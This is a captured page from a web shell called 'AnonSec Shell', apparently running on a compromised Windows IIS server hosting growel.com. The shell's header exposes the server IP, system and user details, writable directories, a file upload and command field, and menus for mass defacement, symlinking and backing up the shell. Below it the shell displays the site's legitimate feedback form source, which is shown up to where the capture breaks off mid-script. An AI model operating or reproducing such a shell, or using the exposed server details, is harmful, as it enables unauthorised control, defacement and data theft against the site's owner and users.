. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 87.98.249.37  /  Your IP : 216.73.216.208   [ Reverse IP ]
Web Server : Microsoft-IIS/10.0
System : Windows NT NS3076740 10.0 build 17763 (Windows Server 2019) AMD64
User : IWPD_292(growel19p) ( 0)
PHP Version : 8.3.12
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/growel.com/httpdocs/Forms/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : C:/Inetpub/vhosts/growel.com/httpdocs/Forms///feedback.aspx
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="feedback.aspx.cs" Inherits="GrowelWeb.Forms.feedback1" %>

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title></title>


    <meta Name="robots" Content="noindex,nofollow">

     <link href="https://growel.com/Includes/css/bootstrap.css" rel="stylesheet" />
    <link href="https://growel.com/Includes/css/style.css" rel="stylesheet" />

    <script src='https://www.google.com/recaptcha/api.js'></script>

    <!-- Main Font-->
	<script src="https://c.webfontfree.com/c.js?f=Square721BT-Roman" type="text/javascript"></script> 

    <style>

        .autocomplete {
  /*the container must be positioned relative:*/
  position: relative;
  display: inline-block;
}


.autocomplete-items {
  position: absolute;
  border: 1px solid #d4d4d4;
  border-bottom: none;
  border-top: none;
  z-index: 990;
  /*position the autocomplete items to be the same width as the container:*/
  top: 100%;
  left: 0;
  right: 0;
}
.autocomplete-items div {
  padding: 10px;
  cursor: pointer;
  background-color: #fff;
  border-bottom: 1px solid #d4d4d4;
}
.autocomplete-items div:hover {
  /*when hovering an item:*/
  background-color: #e9e9e9;
}
.autocomplete-active {
  /*when navigating through the items using the arrow keys:*/
  background-color: DodgerBlue !important;
  color: #ffffff;
}

    </style>


</head>
<body>
    <form id="form1" runat="server">
       <section class="section section-sm bg-white ">
        <div class="shell">
          <div class="range range-sm-center">
            <div class="cell-sm-12 cell-md-12 cell-lg-12">
    

           <div class="col-md-6">
               <label>Enquiry Type <span style="color:red">*</span></label>
               <asp:DropDownList ID="ddlEnquiryType" CssClass="form-control validate" runat="server">
                   <asp:ListItem Value="[Select Enquiry Type]" Text="[Select Enquiry Type]"></asp:ListItem>
                   <asp:ListItem Value="Company Introduction" Text="Company Introduction"></asp:ListItem>
                   <asp:ListItem Value="Dealership / Distributorship Queries" Text="Dealership / Distributorship Queries"></asp:ListItem>
                   <asp:ListItem Value="Product / Solution Enquiry" Text="Product / Solution Enquiry"></asp:ListItem>
                   <asp:ListItem Value="Service Complaint" Text="Service Complaint"></asp:ListItem>
                   <asp:ListItem Value="Product Complaint" Text="Product Complaint"></asp:ListItem>
                   <asp:ListItem Value="Others" Text="Others"></asp:ListItem>
               </asp:DropDownList>
               

           </div>

        <div class="col-md-6">
            <label>Name <span style="color:red">*</span></label>
            <asp:TextBox ID="txtname" runat="server" CssClass="form-control"></asp:TextBox>
            <%--<asp:RequiredFieldValidator ID="RequiredFieldValidator1" runat="server" ErrorMessage="" ControlToValidate="txtname" Display="Dynamic"></asp:RequiredFieldValidator>--%>
        </div>


        <div id="dvverticals" class="col-md-6">
            <label>Verticals  <span style="color:red">*</span></label>
            <asp:DropDownList ID="drpVerticals" AutoPostBack="true" OnSelectedIndexChanged="drpVerticals_SelectedIndexChanged" CssClass="form-control validate" runat="server">
                   <asp:ListItem Value="[Select Verticals]" Text="[Select Verticals]"></asp:ListItem>
                   <asp:ListItem Value="Chemicals" Text="Chemicals"></asp:ListItem>
                   <asp:ListItem Value="Engineering" Text="Engineering"></asp:ListItem>
                   <asp:ListItem Value="Paints" Text="Paints"></asp:ListItem>
                   <asp:ListItem Value="Lube" Text="Lube"></asp:ListItem>
               </asp:DropDownList>
            
        </div>


                <div id="dvprod" class="col-md-6">
            <label>Product  <span style="color:red">*</span></label>
            <asp:DropDownList ID="drpProduct" CssClass="form-control validate" runat="server">
                   
               </asp:DropDownList>
            
        </div>


		 
		
		
                 <div class="col-md-6">
            <label>Email <span style="color:red">*</span></label>
            <asp:TextBox ID="txtemail" runat="server" CssClass="form-control"></asp:TextBox>
            <%--<asp:RequiredFieldValidator ID="RequiredFieldValidator4" runat="server" ErrorMessage="" ControlToValidate="txtemail" Display="Dynamic"></asp:RequiredFieldValidator>--%>
            <%--<asp:RegularExpressionValidator ID="RegularExpressionValidator1" runat="server" ControlToValidate="txtemail" ErrorMessage="Email not correct" ValidationExpression="\w+([-+.']\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*"></asp:RegularExpressionValidator>--%>
        </div>


              

         <div class="col-md-6">
            <label>Mobile <span style="color:red">*</span></label>
            <asp:TextBox ID="txtmobile" runat="server" CssClass="form-control"></asp:TextBox>
            <%--<asp:RequiredFieldValidator ID="RequiredFieldValidator3" runat="server" ErrorMessage="" ControlToValidate="txtmobile" Display="Dynamic"></asp:RequiredFieldValidator>--%>
            
   <%-- <asp:RegularExpressionValidator ID="RegularExpressionValidator2" runat="server" 
      ControlToValidate="txtmobile" ErrorMessage="Enter mobile number corrrectly" 
    ValidationExpression="^\+[1-9]{1}[0-9]{3,14}$" Display="Dynamic"></asp:RegularExpressionValidator>--%>

        </div>

                  <%-- <div class="col-md-6">
            <label>Contact Person <span style="color:red">*</span></label>
            <asp:TextBox ID="txtcontactperson" runat="server" CssClass="form-control"></asp:TextBox>
            
        </div>--%>

       
<div class="col-md-6">
            <label>Country <span style="color:red">*</span></label>
            <asp:DropDownList  runat="server" placeholder="Country" CssClass="form-control validate" ID="ddlcountry" ValidationGroup="form">
      <asp:ListItem disabled >Country</asp:ListItem>
   <asp:ListItem value="India" Selected>India</asp:ListItem>
                <asp:ListItem  value="Afghanistan">Afghanistan </asp:ListItem>
    <asp:ListItem value="Albania">Albania</asp:ListItem>
    <asp:ListItem value="Algeria">Algeria</asp:ListItem>
    <asp:ListItem value="American Samoa">American Samoa</asp:ListItem>
    <asp:ListItem value="Andorra">Andorra</asp:ListItem>
    <asp:ListItem value="Angola">Angola</asp:ListItem>
    <asp:ListItem value="Anguilla">Anguilla</asp:ListItem>
    <asp:ListItem value="Antartica">Antarctica</asp:ListItem>
    <asp:ListItem value="Antigua and Barbuda">Antigua and Barbuda</asp:ListItem>
    <asp:ListItem value="Argentina">Argentina</asp:ListItem>
    <asp:ListItem value="Armenia">Armenia</asp:ListItem>
    <asp:ListItem value="Aruba">Aruba</asp:ListItem>
    <asp:ListItem value="Australia">Australia</asp:ListItem>
    <asp:ListItem value="Austria">Austria</asp:ListItem>
    <asp:ListItem value="Azerbaijan">Azerbaijan</asp:ListItem>
    <asp:ListItem value="Bahamas">Bahamas</asp:ListItem>
    <asp:ListItem value="Bahrain">Bahrain</asp:ListItem>
    <asp:ListItem value="Bangladesh">Bangladesh</asp:ListItem>
    <asp:ListItem value="Barbados">Barbados</asp:ListItem>
    <asp:ListItem value="Belarus">Belarus</asp:ListItem>
    <asp:ListItem value="Belgium">Belgium</asp:ListItem>
    <asp:ListItem value="Belize">Belize</asp:ListItem>
    <asp:ListItem value="Benin">Benin</asp:ListItem>
    <asp:ListItem value="Bermuda">Bermuda</asp:ListItem>
    <asp:ListItem value="Bhutan">Bhutan</asp:ListItem>
    <asp:ListItem value="Bolivia">Bolivia</asp:ListItem>
    <asp:ListItem value="Bosnia and Herzegowina">Bosnia and Herzegowina</asp:ListItem>
    <asp:ListItem value="Botswana">Botswana</asp:ListItem>
    <asp:ListItem value="Bouvet Island">Bouvet Island</asp:ListItem>
    <asp:ListItem value="Brazil">Brazil</asp:ListItem>
    <asp:ListItem value="British Indian Ocean Territory">British Indian Ocean Territory</asp:ListItem>
    <asp:ListItem value="Brunei Darussalam">Brunei Darussalam</asp:ListItem>
    <asp:ListItem value="Bulgaria">Bulgaria</asp:ListItem>
    <asp:ListItem value="Burkina Faso">Burkina Faso</asp:ListItem>
    <asp:ListItem value="Burundi">Burundi</asp:ListItem>
    <asp:ListItem value="Cambodia">Cambodia</asp:ListItem>
    <asp:ListItem value="Cameroon">Cameroon</asp:ListItem>
    <asp:ListItem value="Canada">Canada</asp:ListItem>
    <asp:ListItem value="Cape Verde">Cape Verde</asp:ListItem>
    <asp:ListItem value="Cayman Islands">Cayman Islands</asp:ListItem>
    <asp:ListItem value="Central African Republic">Central African Republic</asp:ListItem>
    <asp:ListItem value="Chad">Chad</asp:ListItem>
    <asp:ListItem value="Chile">Chile</asp:ListItem>
    <asp:ListItem value="China">China</asp:ListItem>
    <asp:ListItem value="Christmas Island">Christmas Island</asp:ListItem>
    <asp:ListItem value="Cocos Islands">Cocos (Keeling) Islands</asp:ListItem>
    <asp:ListItem value="Colombia">Colombia</asp:ListItem>
    <asp:ListItem value="Comoros">Comoros</asp:ListItem>
    <asp:ListItem value="Congo">Congo</asp:ListItem>
    <asp:ListItem value="Congo">Congo, the Democratic Republic of the</asp:ListItem>
    <asp:ListItem value="Cook Islands">Cook Islands</asp:ListItem>
    <asp:ListItem value="Costa Rica">Costa Rica</asp:ListItem>
    <asp:ListItem value="Cota D'Ivoire">Cote d'Ivoire</asp:ListItem>
    <asp:ListItem value="Croatia">Croatia (Hrvatska)</asp:ListItem>
    <asp:ListItem value="Cuba">Cuba</asp:ListItem>
    <asp:ListItem value="Cyprus">Cyprus</asp:ListItem>
    <asp:ListItem value="Czech Republic">Czech Republic</asp:ListItem>
    <asp:ListItem value="Denmark">Denmark</asp:ListItem>
    <asp:ListItem value="Djibouti">Djibouti</asp:ListItem>
    <asp:ListItem value="Dominica">Dominica</asp:ListItem>
    <asp:ListItem value="Dominican Republic">Dominican Republic</asp:ListItem>
    <asp:ListItem value="East Timor">East Timor</asp:ListItem>
    <asp:ListItem value="Ecuador">Ecuador</asp:ListItem>
    <asp:ListItem value="Egypt">Egypt</asp:ListItem>
    <asp:ListItem value="El Salvador">El Salvador</asp:ListItem>
    <asp:ListItem value="Equatorial Guinea">Equatorial Guinea</asp:ListItem>
    <asp:ListItem value="Eritrea">Eritrea</asp:ListItem>
    <asp:ListItem value="Estonia">Estonia</asp:ListItem>
    <asp:ListItem value="Ethiopia">Ethiopia</asp:ListItem>
    <asp:ListItem value="Falkland Islands">Falkland Islands (Malvinas)</asp:ListItem>
    <asp:ListItem value="Faroe Islands">Faroe Islands</asp:ListItem>
    <asp:ListItem value="Fiji">Fiji</asp:ListItem>
    <asp:ListItem value="Finland">Finland</asp:ListItem>
    <asp:ListItem value="France">France</asp:ListItem>
    <asp:ListItem value="France Metropolitan">France, Metropolitan</asp:ListItem>
    <asp:ListItem value="French Guiana">French Guiana</asp:ListItem>
    <asp:ListItem value="French Polynesia">French Polynesia</asp:ListItem>
    <asp:ListItem value="French Southern Territories">French Southern Territories</asp:ListItem>
    <asp:ListItem value="Gabon">Gabon</asp:ListItem>
    <asp:ListItem value="Gambia">Gambia</asp:ListItem>
    <asp:ListItem value="Georgia">Georgia</asp:ListItem>
    <asp:ListItem value="Germany">Germany</asp:ListItem>
    <asp:ListItem value="Ghana">Ghana</asp:ListItem>
    <asp:ListItem value="Gibraltar">Gibraltar</asp:ListItem>
    <asp:ListItem value="Greece">Greece</asp:ListItem>
    <asp:ListItem value="Greenland">Greenland</asp:ListItem>
    <asp:ListItem value="Grenada">Grenada</asp:ListItem>
    <asp:ListItem value="Guadeloupe">Guadeloupe</asp:ListItem>
    <asp:ListItem value="Guam">Guam</asp:ListItem>
    <asp:ListItem value="Guatemala">Guatemala</asp:ListItem>
    <asp:ListItem value="Guinea">Guinea</asp:ListItem>
    <asp:ListItem value="Guinea-Bissau">Guinea-Bissau</asp:ListItem>
    <asp:ListItem value="Guyana">Guyana</asp:ListItem>
    <asp:ListItem value="Haiti">Haiti</asp:ListItem>
    <asp:ListItem value="Heard and McDonald Islands">Heard and Mc Donald Islands</asp:ListItem>
    <asp:ListItem value="Holy See">Holy See (Vatican City State)</asp:ListItem>
    <asp:ListItem value="Honduras">Honduras</asp:ListItem>
    <asp:ListItem value="Hong Kong">Hong Kong</asp:ListItem>
    <asp:ListItem value="Hungary">Hungary</asp:ListItem>
    <asp:ListItem value="Iceland">Iceland</asp:ListItem>
    <asp:ListItem value="Indonesia">Indonesia</asp:ListItem>
    <asp:ListItem value="Iran">Iran (Islamic Republic of)</asp:ListItem>
    <asp:ListItem value="Iraq">Iraq</asp:ListItem>
    <asp:ListItem value="Ireland">Ireland</asp:ListItem>
    <asp:ListItem value="Israel">Israel</asp:ListItem>
    <asp:ListItem value="Italy">Italy</asp:ListItem>
    <asp:ListItem value="Jamaica">Jamaica</asp:ListItem>
    <asp:ListItem value="Japan">Japan</asp:ListItem>
    <asp:ListItem value="Jordan">Jordan</asp:ListItem>
    <asp:ListItem value="Kazakhstan">Kazakhstan</asp:ListItem>
    <asp:ListItem value="Kenya">Kenya</asp:ListItem>
    <asp:ListItem value="Kiribati">Kiribati</asp:ListItem>
    <asp:ListItem value="Democratic People's Republic of Korea">Korea, Democratic People's Republic of</asp:ListItem>
    <asp:ListItem value="Korea">Korea, Republic of</asp:ListItem>
    <asp:ListItem value="Kuwait">Kuwait</asp:ListItem>
    <asp:ListItem value="Kyrgyzstan">Kyrgyzstan</asp:ListItem>
    <asp:ListItem value="Lao">Lao People's Democratic Republic</asp:ListItem>
    <asp:ListItem value="Latvia">Latvia</asp:ListItem>
    <asp:ListItem value="Lebanon">Lebanon</asp:ListItem>
    <asp:ListItem value="Lesotho">Lesotho</asp:ListItem>
    <asp:ListItem value="Liberia">Liberia</asp:ListItem>
    <asp:ListItem value="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</asp:ListItem>
    <asp:ListItem value="Liechtenstein">Liechtenstein</asp:ListItem>
    <asp:ListItem value="Lithuania">Lithuania</asp:ListItem>
    <asp:ListItem value="Luxembourg">Luxembourg</asp:ListItem>
    <asp:ListItem value="Macau">Macau</asp:ListItem>
    <asp:ListItem value="Macedonia">Macedonia, The Former Yugoslav Republic of</asp:ListItem>
    <asp:ListItem value="Madagascar">Madagascar</asp:ListItem>
    <asp:ListItem value="Malawi">Malawi</asp:ListItem>
    <asp:ListItem value="Malaysia">Malaysia</asp:ListItem>
    <asp:ListItem value="Maldives">Maldives</asp:ListItem>
    <asp:ListItem value="Mali">Mali</asp:ListItem>
    <asp:ListItem value="Malta">Malta</asp:ListItem>
    <asp:ListItem value="Marshall Islands">Marshall Islands</asp:ListItem>
    <asp:ListItem value="Martinique">Martinique</asp:ListItem>
    <asp:ListItem value="Mauritania">Mauritania</asp:ListItem>
    <asp:ListItem value="Mauritius">Mauritius</asp:ListItem>
    <asp:ListItem value="Mayotte">Mayotte</asp:ListItem>
    <asp:ListItem value="Mexico">Mexico</asp:ListItem>
    <asp:ListItem value="Micronesia">Micronesia, Federated States of</asp:ListItem>
    <asp:ListItem value="Moldova">Moldova, Republic of</asp:ListItem>
    <asp:ListItem value="Monaco">Monaco</asp:ListItem>
    <asp:ListItem value="Mongolia">Mongolia</asp:ListItem>
    <asp:ListItem value="Montserrat">Montserrat</asp:ListItem>
    <asp:ListItem value="Morocco">Morocco</asp:ListItem>
    <asp:ListItem value="Mozambique">Mozambique</asp:ListItem>
    <asp:ListItem value="Myanmar">Myanmar</asp:ListItem>
    <asp:ListItem value="Namibia">Namibia</asp:ListItem>
    <asp:ListItem value="Nauru">Nauru</asp:ListItem>
    <asp:ListItem value="Nepal">Nepal</asp:ListItem>
    <asp:ListItem value="Netherlands">Netherlands</asp:ListItem>
    <asp:ListItem value="Netherlands Antilles">Netherlands Antilles</asp:ListItem>
    <asp:ListItem value="New Caledonia">New Caledonia</asp:ListItem>
    <asp:ListItem value="New Zealand">New Zealand</asp:ListItem>
    <asp:ListItem value="Nicaragua">Nicaragua</asp:ListItem>
    <asp:ListItem value="Niger">Niger</asp:ListItem>
    <asp:ListItem value="Nigeria">Nigeria</asp:ListItem>
    <asp:ListItem value="Niue">Niue</asp:ListItem>
    <asp:ListItem value="Norfolk Island">Norfolk Island</asp:ListItem>
    <asp:ListItem value="Northern Mariana Islands">Northern Mariana Islands</asp:ListItem>
    <asp:ListItem value="Norway">Norway</asp:ListItem>
    <asp:ListItem value="Oman">Oman</asp:ListItem>
    <asp:ListItem value="Pakistan">Pakistan</asp:ListItem>
    <asp:ListItem value="Palau">Palau</asp:ListItem>
    <asp:ListItem value="Panama">Panama</asp:ListItem>
    <asp:ListItem value="Papua New Guinea">Papua New Guinea</asp:ListItem>
    <asp:ListItem value="Paraguay">Paraguay</asp:ListItem>
    <asp:ListItem value="Peru">Peru</asp:ListItem>
    <asp:ListItem value="Philippines">Philippines</asp:ListItem>
    <asp:ListItem value="Pitcairn">Pitcairn</asp:ListItem>
    <asp:ListItem value="Poland">Poland</asp:ListItem>
    <asp:ListItem value="Portugal">Portugal</asp:ListItem>
    <asp:ListItem value="Puerto Rico">Puerto Rico</asp:ListItem>
    <asp:ListItem value="Qatar">Qatar</asp:ListItem>
    <asp:ListItem value="Reunion">Reunion</asp:ListItem>
    <asp:ListItem value="Romania">Romania</asp:ListItem>
    <asp:ListItem value="Russia">Russian Federation</asp:ListItem>
    <asp:ListItem value="Rwanda">Rwanda</asp:ListItem>
    <asp:ListItem value="Saint Kitts and Nevis">Saint Kitts and Nevis</asp:ListItem> 
    <asp:ListItem value="Saint LUCIA">Saint LUCIA</asp:ListItem>
    <asp:ListItem value="Saint Vincent">Saint Vincent and the Grenadines</asp:ListItem>
    <asp:ListItem value="Samoa">Samoa</asp:ListItem>
    <asp:ListItem value="San Marino">San Marino</asp:ListItem>
    <asp:ListItem value="Sao Tome and Principe">Sao Tome and Principe</asp:ListItem> 
    <asp:ListItem value="Saudi Arabia">Saudi Arabia</asp:ListItem>
    <asp:ListItem value="Senegal">Senegal</asp:ListItem>
    <asp:ListItem value="Seychelles">Seychelles</asp:ListItem>
    <asp:ListItem value="Sierra">Sierra Leone</asp:ListItem>
    <asp:ListItem value="Singapore">Singapore</asp:ListItem>
    <asp:ListItem value="Slovakia">Slovakia (Slovak Republic)</asp:ListItem>
    <asp:ListItem value="Slovenia">Slovenia</asp:ListItem>
    <asp:ListItem value="Solomon Islands">Solomon Islands</asp:ListItem>
    <asp:ListItem value="Somalia">Somalia</asp:ListItem>
    <asp:ListItem value="South Africa">South Africa</asp:ListItem>
    <asp:ListItem value="South Georgia">South Georgia and the South Sandwich Islands</asp:ListItem>
    <asp:ListItem value="Span">Spain</asp:ListItem>
    <asp:ListItem value="SriLanka">Sri Lanka</asp:ListItem>
    <asp:ListItem value="St. Helena">St. Helena</asp:ListItem>
    <asp:ListItem value="St. Pierre and Miguelon">St. Pierre and Miquelon</asp:ListItem>
    <asp:ListItem value="Sudan">Sudan</asp:ListItem>
    <asp:ListItem value="Suriname">Suriname</asp:ListItem>
    <asp:ListItem value="Svalbard">Svalbard and Jan Mayen Islands</asp:ListItem>
    <asp:ListItem value="Swaziland">Swaziland</asp:ListItem>
    <asp:ListItem value="Sweden">Sweden</asp:ListItem>
    <asp:ListItem value="Switzerland">Switzerland</asp:ListItem>
    <asp:ListItem value="Syria">Syrian Arab Republic</asp:ListItem>
    <asp:ListItem value="Taiwan">Taiwan, Province of China</asp:ListItem>
    <asp:ListItem value="Tajikistan">Tajikistan</asp:ListItem>
    <asp:ListItem value="Tanzania">Tanzania, United Republic of</asp:ListItem>
    <asp:ListItem value="Thailand">Thailand</asp:ListItem>
    <asp:ListItem value="Togo">Togo</asp:ListItem>
    <asp:ListItem value="Tokelau">Tokelau</asp:ListItem>
    <asp:ListItem value="Tonga">Tonga</asp:ListItem>
    <asp:ListItem value="Trinidad and Tobago">Trinidad and Tobago</asp:ListItem>
    <asp:ListItem value="Tunisia">Tunisia</asp:ListItem>
    <asp:ListItem value="Turkey">Turkey</asp:ListItem>
    <asp:ListItem value="Turkmenistan">Turkmenistan</asp:ListItem>
    <asp:ListItem value="Turks and Caicos">Turks and Caicos Islands</asp:ListItem>
    <asp:ListItem value="Tuvalu">Tuvalu</asp:ListItem>
    <asp:ListItem value="Uganda">Uganda</asp:ListItem>
    <asp:ListItem value="Ukraine">Ukraine</asp:ListItem>
    <asp:ListItem value="United Arab Emirates">United Arab Emirates</asp:ListItem>
    <asp:ListItem value="United Kingdom">United Kingdom</asp:ListItem>
    <asp:ListItem value="United States">United States</asp:ListItem>
    <asp:ListItem value="United States Minor Outlying Islands">United States Minor Outlying Islands</asp:ListItem>
    <asp:ListItem value="Uruguay">Uruguay</asp:ListItem>
    <asp:ListItem value="Uzbekistan">Uzbekistan</asp:ListItem>
    <asp:ListItem value="Vanuatu">Vanuatu</asp:ListItem>
    <asp:ListItem value="Venezuela">Venezuela</asp:ListItem>
    <asp:ListItem value="Vietnam">Viet Nam</asp:ListItem>
    <asp:ListItem value="Virgin Islands (British)">Virgin Islands (British)</asp:ListItem>
    <asp:ListItem value="Virgin Islands (U.S)">Virgin Islands (U.S.)</asp:ListItem>
    <asp:ListItem value="Wallis and Futana Islands">Wallis and Futuna Islands</asp:ListItem>
    <asp:ListItem value="Western Sahara">Western Sahara</asp:ListItem>
    <asp:ListItem value="Yemen">Yemen</asp:ListItem>
    <asp:ListItem value="Yugoslavia">Yugoslavia</asp:ListItem>
    <asp:ListItem value="Zambia">Zambia</asp:ListItem>
    <asp:ListItem value="Zimbabwe">Zimbabwe</asp:ListItem>
        <asp:ListItem value="Zimbabwe5">Zimbabwe5</asp:ListItem>
</asp:DropDownList>
            <asp:RequiredFieldValidator ID="RequiredFieldValidator10" runat="server" ErrorMessage="" ControlToValidate="ddlcountry" Display="Dynamic"></asp:RequiredFieldValidator>
        </div>


        <%--<div class="col-md-6 autocomplete">
            <label>State <span style="color:red">*</span></label>
            <asp:TextBox ID="txtState" runat="server"  CssClass="form-control"></asp:TextBox>
             
        </div>--%>


        <div class="col-md-6">
            <label>City <span style="color:red">*</span></label>
            <asp:TextBox ID="txtCity" runat="server" CssClass="form-control"></asp:TextBox>
             <%--<asp:RequiredFieldValidator ID="RequiredFieldValidator6" runat="server" ErrorMessage="" ControlToValidate="txtCity" Display="Dynamic"></asp:RequiredFieldValidator>--%>
            
        </div>
          


          

          

          <%--<div class="col-md-6">
            <label>Address<span style="color:red">*</span></label>
            <asp:TextBox ID="txtaddress" TextMode="MultiLine" runat="server" CssClass="form-control"></asp:TextBox>
                        

        </div>--%>
        
        
           <div class="col-md-6">
            <label>Feedback Details <span style="color:red">*</span></label>
            <asp:TextBox ID="txtfeedback" TextMode="MultiLine" runat="server" CssClass="form-control"></asp:TextBox>
            <%--<asp:RequiredFieldValidator ID="RequiredFieldValidator5" runat="server" ErrorMessage="" ControlToValidate="txtfeedback"></asp:RequiredFieldValidator>--%>
               <br />
                By providing any personal information to us, you are consenting to our <a target="_blank" href ="https://growel.com/page/privacy%20policy" >Privacy Policy</a>
            <br />


            <asp:Button ID="btnsubmit" runat="server" OnClientClick="return dovalidation();" Text="Submit" OnClick="btnsubmit_Click" CssClass="btn btn-default" />
            
           <input type="reset" class="btn btn-default" />
       <br />
            <small style="color:red">Fields with (*) mark are mandatory</small>


        </div>

                <div class="col-md-6">
                    <label>&nbsp;</label>
                </div>
         
                  <div class="col-md-6">
                    <label>&nbsp;</label>
                </div>
         

        
      
      


        <div class="col-md-6">

           
        </div>

</div>

              </div>
            </div>
           </section>
    </form>



    <script type ="text/javascript">

        $(document).ready(function () {
            $("#dvverticals").hide();
            $("#dvprod").hide();

            onChnage();

        });

        $('#ddlEnquiryType').change(function() {
            
            onChnage();
            


        });

        function onChnage() {
            var ddlvalue = $('#ddlEnquiryType').val();


          

            if (ddlvalue == "Dealership / Distributorship Queries" ||
                ddlvalue == "Product / Solution Enquiry" ||
                ddlvalue == "Service Complaint" ||
                ddlvalue == "Product Complaint" ) {
                $("#dvverticals").show();
                $("#dvprod").show();
            }
            else {
                $("#dvverticals").hide();
                $("#dvprod").hide();
            }
        }

    </script>


</body>

    <%--         <div class="col-md-12">
            <label>Company Name <sup>*</sup></label>
            <asp:TextBox ID="txtcompany" runat="server" CssClass="form-control" ></asp:TextBox>
            <asp:RequiredFieldValidator ID="RequiredFieldValidator2" runat="server" ErrorMessage="Required" ControlToValidate="txtcompany" Display="Dynamic"></asp:RequiredFieldValidator>
        </div>--%>


       <%-- <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.css" />
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js"></script>
    <script type="text/javascript" charset="utf-8">
        $(document).ready(function () {
            $("#txtcountry").autocomplete({
                minLength: 2,
                source: ["África do Sul", "Albânia", "Alemanha", "Andorra", "Angola", "Anguilla", "Antigua", "Arábia Saudita", "Argentina", "Armênia", "Aruba", "Austrália", "Áustria", "Azerbaijão", "Bahamas", "Bahrein", "Bangladesh", "Barbados", "Bélgica", "Benin", "Bermudas", "Botsuana", "Brasil", "Brunei", "Bulgária", "Burkina Fasso", "Butão", "Cabo Verde", "Camarões", "Camboja", "Canadá", "Cazaquistão", "Chade", "Chile", "China", "Vaticano", "Colômbia", "Congo", "Coreia do Norte", "Coreia do Sul", "Costa do Marfim", "Costa Rica", "Croácia", "Dinamarca", "Djibuti", "Dominica", "Estados Unidos da América", "Egito", "El Salvador", "Emirados Árabes", "Equador", "Eritreia", "Escócia", "Eslováquia", "Eslovênia", "Espanha", "Estônia", "Etiópia", "Fiji", "Filipinas", "Finlândia", "França", "Gabão", "Gâmbia", "Gana", "Geórgia", "Gibraltar", "Granada", "Grécia", "Guadalupe", "Guam", "Guatemala", "Guiana", "Guiana Francesa", "Guiné-Bissau", "Haiti", "Holanda", "Honduras", "Hong Kong", "Hungria", "Iêmen", "Ilhas Cayman", "Ilhas Cook", "Ilhas Curaçao", "Ilhas Marshall", "Ilhas Turks & Caicos", "Ilhas Virgens (brit.)", "Ilhas Virgens(amer.)", "Ilhas Wallis e Futuna", "Índia", "Indonésia", "Inglaterra", "Irlanda", "Islândia", "Israel", "Itália", "Jamaica", "Japão", "Jordânia", "Kuwait", "Letônia", "Líbano", "Liechtenstein", "Lituânia", "Luxemburgo", "Macau", "Macedônia", "Madagáscar", "Malásia", "Malaui", "Mali", "Malta", "Marrocos", "Martinica", "Mauritânia", "Mauritius", "México", "Moldova", "Mônaco", "Montserrat", "Nepal", "Nicarágua", "Níger", "Nigéria", "Noruega", "Nova Caledônia", "Nova Zelândia", "Omã", "Palau", "Panamá", "Papua-Nova Guiné", "Paquistão", "Peru", "Polinésia Francesa", "Polônia", "Porto Rico", "Portugal", "Qatar", "Quênia", "República Dominicana", "República Tcheca", "Reunion", "Romênia", "Ruanda", "Rússia", "Saipan", "Samoa Americana", "Senegal", "Serra Leone", "Seychelles", "Singapura", "Síria", "Sri Lanka", "St. Kitts & Nevis", "St. Lúcia", "St. Vincent", "Sudão", "Suécia", "Suíça", "Suriname", "Tailândia", "Taiwan", "Tanzânia", "Togo", "Trinidad & Tobago", "Tunísia", "Turquia", "Ucrânia", "Uganda", "Uruguai", "Venezuela", "Vietnam", "Zaire", "Zâmbia", "Zimbábue"]
            });
        });
    </script>--%>


    <script type="text/javascript" charset="utf-8">

        var States = ["Andhra Pradesh", "Arunachal Pradesh", "Assam", "Bihar",
            "Chhattisgarh", "Goa", "Gujarat", "Haryana", "Himachal Pradesh", "Jharkhand", "Karnataka",
            "Kerala", "Madhya Pradesh", "Maharashtra", "Manipur", "Meghalaya", "Mizoram",
            "Nagaland", "Odisha", "Punjab", "Rajasthan", "Sikkim", "Tamil Nadu", "Telangana",
            "Tripura", "Uttar Pradesh", "Uttarakhand", "West Bengal"];

        //autocomplete(document.getElementById("txtState"), States);



        $(document).ready(function () {

            
            
            console.log('load1');
            $('#txtState.ClientID').keypress(function () {
                var ddlcountry = $('#ddlcountry').val();
                console.log(ddlcountry);
                if (ddlcountry == "India") {
                    autocomplete(document.getElementById("txtState"), States);
                }
            });

        });
        
        function myFunction() {
            return;
        }
        

        function autocomplete(inp, arr) {

        
            //if (document.getElementById("ddlcountry").value != "India") {
            //    var x = document.getElementById(inp.id + "autocomplete-list");
            //    removeActive(x);
            //    inp.removeEventListener("input", myFunction);
            //    inp.removeEventListener("keydown", myFunction);
            //    return ;
            //}

            //console.log(document.getElementById("ddlcountry").value);

            /*the autocomplete function takes two arguments,
            the text field element and an array of possible autocompleted values:*/
            var currentFocus;
            /*execute a function when someone writes in the text field:*/
            inp.addEventListener("input", function (e) {
                var a, b, i, val = this.value;
                /*close any already open lists of autocompleted values*/
                closeAllLists();
                if (!val) { return false; }
                currentFocus = -1;
                /*create a DIV element that will contain the items (values):*/
                a = document.createElement("DIV");
                a.setAttribute("id", this.id + "autocomplete-list");
                a.setAttribute("class", "autocomplete-items");
                /*append the DIV element as a child of the autocomplete container:*/
                this.parentNode.appendChild(a);
                /*for each item in the array...*/
                for (i = 0; i < arr.length; i++) {
                    /*check if the item starts with the same letters as the text field value:*/
                    if (arr[i].substr(0, val.length).toUpperCase() == val.toUpperCase()) {
                        /*create a DIV element for each matching element:*/
                        b = document.createElement("DIV");
                        /*make the matching letters bold:*/
                        b.innerHTML = "<strong>" + arr[i].substr(0, val.length) + "</strong>";
                        b.innerHTML += arr[i].substr(val.length);
